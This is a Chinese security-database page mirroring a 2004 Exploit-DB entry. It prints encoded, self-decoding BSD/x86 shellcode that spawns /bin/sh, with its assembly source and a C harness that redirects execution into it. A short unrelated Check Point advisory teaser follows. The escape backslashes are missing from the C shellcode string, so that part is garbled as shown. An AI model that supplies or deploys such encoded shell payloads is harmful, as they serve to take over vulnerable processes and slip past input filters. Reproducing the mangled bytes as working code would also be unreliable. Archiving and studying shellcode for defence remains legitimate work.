BSD/x86 – execve(/bin/sh) Encoded Shellcode (49 bytes)

BSD/x86 – execve(/bin/sh) Encoded Shellcode (49 bytes)

漏洞ID 1054685 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSD/x86 – execve(/bin/sh) Encoded Shellcode (49 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – execve(/bin/sh) Encoded Shellcode (49 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13251
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* Self decripting (dec/inc) shellcode executes /bin/sh
   Size  49 bytes
   OS	   *BSD
  		/rootteam/dev0id	(www.sysworld.net)
			[email protected] 

BITS	32
jmp	short	shellcode
main:
	pop	esi
	xor	ecx,ecx
	mov	cl,28
main_decript:	
	inc byte [esi+ecx]
	loop	main_decript
	inc byte [esi]
	push	esi
	ret	


shellcode:
call	main

db 	0xea,0x0d,0x5d,0x30,0xbf,0x87,0x45,0x06,0x4f,0x53,0x55,0xaf,0x3a,0x4f,0xcc
db	0x7f,0xe7,0xec,0xfe,0xfe,0xfe,0x2e,0x61,0x68,0x6d,0x2e,0x72,0x67
*/

char shellcode[] =
	"xebx0ex5ex31xc9xb1x1cxfex04x0exe2xfbxfex06x56"
	"xc3xe8xedxffxffxffxeax0dx5dx30xbfx87x45x06x4f"
	"x53x55xafx3ax4fxccx7fxe7xecxfexfexfex2ex61x68"
	"x6dx2ex72x67";

int
main(void)
{
	int *ret;
	ret = (int*)&ret + 2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Check Point Firewall-1 Internal Address Leakage Vulnerability

Check Point Firewall-1 Internal Address Leakage Vulnerability 漏洞ID 1104283 漏洞类型 Design Error 发布时间 2000-03-11 更新时间 2000-03-11 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享